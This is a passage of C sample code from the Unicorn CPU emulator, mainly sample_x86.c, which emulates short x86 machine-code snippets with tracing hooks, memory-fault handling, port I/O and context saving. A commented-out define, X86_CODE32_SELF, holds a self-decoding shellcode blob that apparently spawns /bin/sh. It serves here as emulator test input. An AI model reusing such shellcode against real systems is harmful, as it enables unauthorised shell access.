ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, CODE, sizeof(CODE) - 1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS + sizeof(CODE) - 1); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_TRICORE_REG_D0, &d0); printf(">>> d0 = 0x%x\n", d0); uc_reg_read(uc, UC_TRICORE_REG_D1, &d1); printf(">>> d1 = 0x%x\n", d1); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_tricore(); return 0; } �����������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_x86.c������������������������������������������������������������������0000664�0000000�0000000�00000136271�14675241067�0017014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to demonstrate how to emulate X86 code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define X86_CODE32 \ "\x41\x4a\x66\x0f\xef\xc1" // INC ecx; DEC edx; PXOR xmm0, xmm1 #define X86_CODE32_JUMP \ "\xeb\x02\x90\x90\x90\x90\x90\x90" // jmp 4; nop; nop; nop; nop; nop; nop // #define X86_CODE32_SELF // "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41" // #define X86_CODE32 "\x51\x51\x51\x51" // PUSH ecx; #define X86_CODE32_LOOP "\x41\x4a\xeb\xfe" // INC ecx; DEC edx; JMP self-loop #define X86_CODE32_MEM_WRITE \ "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov [0xaaaaaaaa], ecx; INC ecx; DEC // edx #define X86_CODE32_MEM_READ \ "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx #define X86_CODE32_MEM_READ_IN_TB \ "\x40\x8b\x1d\x00\x00\x10\x00\x42" // inc eax; mov ebx, [0x100000]; inc edx #define X86_CODE32_JMP_INVALID \ "\xe9\xe9\xee\xee\xee\x41\x4a" // JMP outside; INC ecx; DEC edx #define X86_CODE32_INOUT \ "\x41\xE4\x3F\x4a\xE6\x46\x43" // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, // AL; INC ebx #define X86_CODE32_INC "\x40" // INC eax // #define X86_CODE64 "\x41\xBC\x3B\xB0\x28\x2A \x49\x0F\xC9 \x90 //\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9" // //<== still crash #define X86_CODE64 //"\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9" #define X86_CODE64 \ "\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90" \ "\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A" \ "\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5" \ "\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E" \ "\x09\x3C\x59" #define X86_CODE16 "\x00\x00" // add byte ptr [bx + si], al #define X86_CODE64_SYSCALL "\x0f\x05" // SYSCALL #define X86_MMIO_CODE \ "\x89\x0d\x04\x00\x02\x00\x8b\x0d\x04\x00\x02\x00" // mov [0x20004], ecx; // mov ecx, [0x20004] /* * 0x1000 xor dword ptr [edi+0x3], eax ; edi=0x1000, eax=0xbc4177e6 * 0x1003 dw 0x3ea98b13 */ #define X86_CODE32_SMC "\x31\x47\x03\x13\x8b\xa9\x3e" // memory address where emulation starts #define ADDRESS 0x1000000 // callback for tracing basic blocks static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block 
size = 0x%x\n", address, size); } // callback for tracing instruction static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { int eflags; printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); printf(">>> --- EFLAGS is 0x%x\n", eflags); // Uncomment below code to stop the emulation using uc_emu_stop() // if (address == 0x1000009) // uc_emu_stop(uc); } // callback for tracing instruction static void hook_code64(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { uint64_t rip; uc_reg_read(uc, UC_X86_REG_RIP, &rip); printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); printf(">>> RIP is 0x%" PRIx64 "\n", rip); // Uncomment below code to stop the emulation using uc_emu_stop() // if (address == 0x1000009) // uc_emu_stop(uc); } // callback for tracing memory access (READ or WRITE) static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { switch (type) { default: // return false to indicate we want to stop emulation return false; case UC_MEM_WRITE_UNMAPPED: printf(">>> Missing memory is being WRITE at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", address, size, value); // map this memory in with 2MB in size uc_mem_map(uc, 0xaaaa0000, 2 * 1024 * 1024, UC_PROT_ALL); // return true to indicate we want to continue return true; } } // dummy callback static bool hook_mem_invalid_dummy(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { // stop emulation return false; } static void hook_mem64(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { switch (type) { default: break; case UC_MEM_READ: printf(">>> Memory is being READ at 0x%" PRIx64 ", data size = %u\n", address, size); break; case UC_MEM_WRITE: printf(">>> Memory is being WRITE at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", address, size, value); break; } } // callback for IN instruction (X86). // this returns the data read from the port static uint32_t hook_in(uc_engine *uc, uint32_t port, int size, void *user_data) { uint32_t eip; uc_reg_read(uc, UC_X86_REG_EIP, &eip); printf("--- reading from port 0x%x, size: %u, address: 0x%x\n", port, size, eip); switch (size) { default: return 0; // should never reach this case 1: // read 1 byte to AL return 0xf1; case 2: // read 2 byte to AX return 0xf2; break; case 4: // read 4 byte to EAX return 0xf4; } } // callback for OUT instruction (X86). static void hook_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { uint32_t tmp = 0; uint32_t eip; uc_reg_read(uc, UC_X86_REG_EIP, &eip); printf("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x\n", port, size, value, eip); // confirm that value is indeed the value of AL/AX/EAX switch (size) { default: return; // should never reach this case 1: uc_reg_read(uc, UC_X86_REG_AL, &tmp); break; case 2: uc_reg_read(uc, UC_X86_REG_AX, &tmp); break; case 4: uc_reg_read(uc, UC_X86_REG_EAX, &tmp); break; } printf("--- register value = 0x%x\n", tmp); } // callback for SYSCALL instruction (X86). 
static void hook_syscall(uc_engine *uc, void *user_data) { uint64_t rax; uc_reg_read(uc, UC_X86_REG_RAX, &rax); if (rax == 0x100) { rax = 0x200; uc_reg_write(uc, UC_X86_REG_RAX, &rax); } else printf("ERROR: was not expecting rax=0x%" PRIx64 " in syscall\n", rax); } static bool hook_memalloc(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { uint64_t algined_address = address & 0xFFFFFFFFFFFFF000ULL; int aligned_size = ((int)(size / 0x1000) + 1) * 0x1000; printf(">>> Allocating block at 0x%" PRIx64 " (0x%" PRIx64 "), block size = 0x%x (0x%x)\n", address, algined_address, size, aligned_size); uc_mem_map(uc, algined_address, aligned_size, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, algined_address, X86_CODE32, sizeof(X86_CODE32) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return false; } // this recovers from missing memory, so we return true return true; } static void test_miss_code(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code - missing code\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace1, UC_HOOK_CODE, hook_code, NULL, 1, 0); // auto-allocate memory on access uc_hook_add(uc, &trace2, UC_HOOK_MEM_UNMAPPED, hook_memalloc, NULL, 1, 0); // emulate machine code, without having the code in yet err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } static void test_i386(void) { uc_engine *uc; uc_err err; uint32_t tmp; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register // XMM0 and XMM1 registers, low qword then high qword uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; uint64_t r_xmm1[2] = {0x8090a0b0c0d0e0f0, 0x0010203040506070}; printf("Emulate i386 code\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0); uc_reg_write(uc, UC_X86_REG_XMM1, &r_xmm1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); printf(">>> XMM0 = 0x%.16" PRIx64 "%.16" PRIx64 "\n", r_xmm0[1], r_xmm0[0]); // read from memory if (!uc_mem_read(uc, ADDRESS, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", ADDRESS); uc_close(uc); } static void test_i386_map_ptr(void) { uc_engine *uc; uc_err err; uint32_t tmp; uc_hook trace1, trace2; void *mem; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code - use uc_mem_map_ptr()\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // malloc 2MB memory for this emulation mem = calloc(1, 2 * 1024 * 1024); if (mem == NULL) { printf("Failed to malloc()\n"); return; } uc_mem_map_ptr(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL, mem); // write machine code to be emulated to memory if (!memcpy(mem, X86_CODE32, sizeof(X86_CODE32) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error 
returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); // read from memory if (!uc_mem_read(uc, ADDRESS, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", ADDRESS); uc_close(uc); free(mem); } static void test_i386_jump(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; printf("Emulate i386 code with jump\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_JUMP, sizeof(X86_CODE32_JUMP) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // tracing 1 basic block with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, ADDRESS, ADDRESS); // tracing 1 instruction at ADDRESS uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_JUMP) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } printf(">>> Emulation done. Below is the CPU context\n"); uc_close(uc); } // emulate code that loop forever static void test_i386_loop(void) { uc_engine *uc; uc_err err; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code that loop forever\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_LOOP, sizeof(X86_CODE32_LOOP) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // emulate machine code in 2 seconds, so we can quit even // if the code loops err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_LOOP) - 1, 2 * UC_SECOND_SCALE, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } // emulate code that read invalid memory static void test_i386_invalid_mem_read(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code that read from invalid memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_MEM_READ, sizeof(X86_CODE32_MEM_READ) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_MEM_READ) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } // emulate code that write invalid memory static void test_i386_invalid_mem_write(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2, trace3; uint32_t tmp; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code that write to invalid memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_MEM_WRITE, sizeof(X86_CODE32_MEM_WRITE) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // intercept invalid memory events uc_hook_add(uc, &trace3, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_MEM_WRITE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); // read from memory if (!uc_mem_read(uc, 0xaaaaaaaa, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xaaaaaaaa, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", 0xaaaaaaaa); if (!uc_mem_read(uc, 0xffffffaa, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xffffffaa, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", 0xffffffaa); uc_close(uc); } // emulate code that jump to invalid memory static void test_i386_jump_invalid(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code that jumps to invalid memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_JMP_INVALID, sizeof(X86_CODE32_JMP_INVALID) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_JMP_INVALID) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } static void test_i386_inout(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2, trace3, trace4; int r_eax = 0x1234; // EAX register int r_ecx = 0x6789; // ECX register printf("Emulate i386 code with IN/OUT instructions\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_INOUT, sizeof(X86_CODE32_INOUT) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // uc IN instruction uc_hook_add(uc, &trace3, UC_HOOK_INSN, hook_in, NULL, 1, 0, UC_X86_INS_IN); // uc OUT instruction uc_hook_add(uc, &trace4, UC_HOOK_INSN, hook_out, NULL, 1, 0, UC_X86_INS_OUT); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INOUT) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); printf(">>> EAX = 0x%x\n", r_eax); printf(">>> ECX = 0x%x\n", r_ecx); uc_close(uc); } // emulate code and save/restore the CPU context static void test_i386_context_save(void) { uc_engine *uc; uc_context *context; uc_err err; int r_eax = 0x1; // EAX register printf("Save/restore CPU context in opaque blob\n"); // initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 8KB memory for this emulation uc_mem_map(uc, ADDRESS, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_INC, sizeof(X86_CODE32_INC) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); // emulate machine code in infinite time printf(">>> Running emulation for the first time\n"); err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // allocate and save the CPU context printf(">>> Saving CPU context\n"); err = uc_context_alloc(uc, &context); if (err) { printf("Failed on uc_context_alloc() with error returned: %u\n", err); return; } err = uc_context_save(uc, context); if (err) { printf("Failed on uc_context_save() with error returned: %u\n", err); return; } // emulate machine code again printf(">>> Running emulation for the second time\n"); err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // restore CPU context err = uc_context_restore(uc, context); if (err) { printf("Failed on uc_context_restore() with error returned: %u\n", err); return; } // now print out some registers printf(">>> CPU context restored. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // modify some registers of the context r_eax = 0xc8; uc_context_reg_write(context, UC_X86_REG_EAX, &r_eax); // and restore CPU context again err = uc_context_restore(uc, context); if (err) { printf("Failed on uc_context_restore() with error returned: %u\n", err); return; } // now print out some registers printf(">>> CPU context restored with modification. Below is the CPU " "context\n"); uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); printf(">>> EAX = 0x%x\n", r_eax); // free the CPU context err = uc_context_free(context); if (err) { printf("Failed on uc_free() with error returned: %u\n", err); return; } uc_close(uc); } #if 0 static void test_i386_invalid_c6c7(void) { uc_engine *uc; uc_err err; uint8_t codebuf[16] = { 0 }; uint8_t opcodes[] = { 0xc6, 0xc7 }; bool valid_masks[4][8] = { { true, false, false, false, false, false, false, false }, { true, false, false, false, false, false, false, false }, { true, false, false, false, false, false, false, false }, { true, false, false, false, false, false, false, true }, }; int i, j, k; printf("Emulate i386 C6/C7 opcodes\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); for (i = 0; i < 2; ++i) { // set opcode codebuf[0] = opcodes[i]; for (j = 0; j < 4; ++j) { for (k = 0; k < 8; ++k) { // set Mod bits codebuf[1] = (uint8_t) (j << 6); // set Reg bits codebuf[1] |= (uint8_t) (k << 3); // perform validation if (uc_mem_write(uc, ADDRESS, codebuf, sizeof(codebuf))) { printf("Failed to write emulation code to memory, quit!\n"); return; } err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(codebuf), 0, 0); if ((err != UC_ERR_INSN_INVALID) ^ valid_masks[j][k]) { printf("Unexpected uc_emu_start() error returned %u: %s\n", err, uc_strerror(err)); return; } } } } printf(">>> Emulation done.\n"); uc_close(uc); } #endif static void test_x86_64(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2, trace3, trace4; int64_t rax = 0x71f3029efd49d41d; int64_t rbx = 0xd87b45277f133ddb; int64_t rcx = 0xab40d1ffd8afc461; int64_t rdx = 0x919317b4a733f01; int64_t rsi = 0x4c24e753a17ea358; int64_t rdi = 0xe509a57d2571ce96; int64_t r8 = 0xea5b108cc2b9ab1f; int64_t r9 = 0x19ec097c8eb618c1; 
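    /*
     * Aside (not part of the original sample): the long uc_reg_write()
     * sequence below can equivalently use Unicorn's batch API. A minimal
     * sketch, assuming the same uc handle and register variables:
     *
     *   int regs[] = {UC_X86_REG_RAX, UC_X86_REG_RBX, UC_X86_REG_RCX};
     *   void *vals[] = {&rax, &rbx, &rcx};
     *   uc_reg_write_batch(uc, regs, vals, 3);
     */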
